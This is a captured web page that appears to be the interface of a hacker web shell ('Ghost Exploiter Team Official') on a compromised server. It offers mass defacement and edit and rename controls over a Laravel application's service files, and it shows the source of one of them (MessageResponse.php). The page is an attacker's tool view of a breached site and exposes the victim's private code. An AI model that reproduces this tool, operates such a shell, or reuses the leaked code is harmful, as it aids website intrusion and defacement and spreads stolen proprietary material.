Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Domain
/
Project
/
Services
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AppServiceProvider.php
0.787KB
edt
ren
BaseApiRequest.php
0.269KB
edt
ren
Dto-20260128154549.php
0KB
edt
ren
Dto.php
0KB
edt
ren
MessageResponse.php
1.271KB
edt
ren
PaymentService.php
31.754KB
edt
ren
Permission.php
0.239KB
edt
ren
ProjectGroupService-202
...
11.001KB
edt
ren
ProjectGroupService.php
11.001KB
edt
ren
ProjectService-20260128
...
11.537KB
edt
ren
ProjectService.php
11.537KB
edt
ren
System.php
0.782KB
edt
ren
TokenResponse.php
0KB
edt
ren
api.php
1.377KB
edt
ren
<?php declare(strict_types=1); namespace App\Responses; use App\BaseClasses\BaseResponse; use Carbon\Carbon; use Illuminate\Http\{JsonResponse}; use Illuminate\Support\Facades\Context; use Illuminate\Support\Str; class MessageResponse extends BaseResponse { public function __construct( private string $message, private int $status, ) { } public function toResponse($request): JsonResponse { $requestId = Context::get(key: 'request_id'); $timestamp = Context::get(key: 'timestamp'); return new JsonResponse( data: [ 'status' => $this->status, 'data' => [ 'message' => __(key: $this->message) ], 'metadata' => [ 'request_id' => $requestId, 'timestamp' => $timestamp ], ], status: $this->status ); } public static function example(): array { return [ 'status' => 200, 'data' => [ 'message' => 'ok' ], 'metadata' => [ 'request_id' => Str::uuid()->toString(), 'timestamp' => Carbon::now()->toString() ], ]; } }